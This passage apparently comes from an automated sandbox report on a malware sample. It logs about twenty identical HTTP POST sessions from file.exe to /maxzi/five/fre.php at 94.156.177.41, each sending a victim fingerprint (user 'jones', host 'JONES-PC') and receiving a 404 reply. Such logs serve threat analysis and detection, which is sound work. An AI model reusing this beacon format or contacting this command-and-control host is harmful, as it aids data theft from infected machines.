                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.44978794.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:04.751878023 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:04.874345064 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:06.235555887 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:06 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.44978894.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:06.501547098 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:06.624696970 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:07.860249996 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:07 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.44979494.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:08.127332926 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:08.251882076 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:09.681982994 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:09 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.44980094.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:09.955069065 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:10.075035095 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:11.305012941 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:11 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.44980694.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:11.574165106 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:11.694205046 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:13.054687023 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:12 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.44980794.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:13.330580950 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:13.452853918 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:14.727401018 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:14 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.44981494.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:14.984954119 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:15.106128931 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:16.480851889 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:16 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.44982094.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:16.753679037 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:16.873575926 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:18.289005995 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:18 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.44982694.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:18.652259111 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:18.772634029 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:20.131437063 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:19 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.44983094.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:20.393621922 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:20.515913963 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:21.922034025 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:21 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.2.44983494.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:22.188827991 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:22.314599991 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:23.676054955 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:23 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.2.44983994.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:23.947361946 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:24.067070961 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:25.302767992 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:25 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.2.44984594.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:25.577486992 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:25.697513103 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:27.054007053 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:26 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.2.44985194.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:27.315241098 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:27.435691118 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:28.888890028 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:28 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.2.44985394.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:29.157468081 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:29.277427912 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:30.602054119 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:30 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          40192.168.2.44985894.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:30.860815048 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:30.980501890 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:32.319843054 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:32 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.2.44986494.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:32.582351923 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:32.779201984 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:34.064419031 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:33 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          42192.168.2.44986994.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:34.334594965 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:34.454699993 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:35.909826040 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:35 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          43192.168.2.44987594.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:36.518543959 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:36.638263941 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:37.911163092 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:37 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
